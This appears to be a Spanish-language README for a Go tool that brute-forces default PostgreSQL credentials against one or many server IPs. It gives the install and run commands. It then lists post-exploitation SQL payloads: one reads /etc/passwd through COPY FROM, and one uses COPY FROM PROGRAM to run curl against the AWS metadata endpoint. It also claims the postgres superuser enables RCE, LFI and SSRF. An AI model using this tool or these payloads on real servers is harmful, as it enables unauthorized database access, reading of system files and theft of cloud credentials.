
Esta herramienta toma una lista de credenciales predeterminadas y las prueba contra un servidor postgresql, registrando las que funcionan y las bases de datos a las que tiene acceso.
Este script de Go lee una lista de nombres de usuario y contraseñas de un archivo llamado creds.txt y los prueba contra una base de datos PostgreSQL.
El script acepta una IP del servidor PostgreSQL como argumento de línea de comandos o un archivo de texto con IPs.
Si se concede acceso, el script escribe esta salida en un archivo llamado pg-output.txt.
Si el usuario postgres está disponible, normalmente es un superusuario que puede permitir RCE, LFI o SSRf.
go install -v github.com/RandomRobbieBF/postgres-bruteforcer@latest
go run postgres-brute.go 1.1.1.1
postgres
Obtener /etc/passwd/
CREATE TABLE myfile (input TEXT);
COPY myfile FROM '/etc/passwd';
SELECT input FROM myfile;
SSRF - Obtener metadatos de AWS
CREATE TABLE weather_json (cities TEXT);
COPY weather_json FROM PROGRAM 'curl -L http://169.254.169.254/latest/meta-data/';
SELECT weather_json FROM weather_json;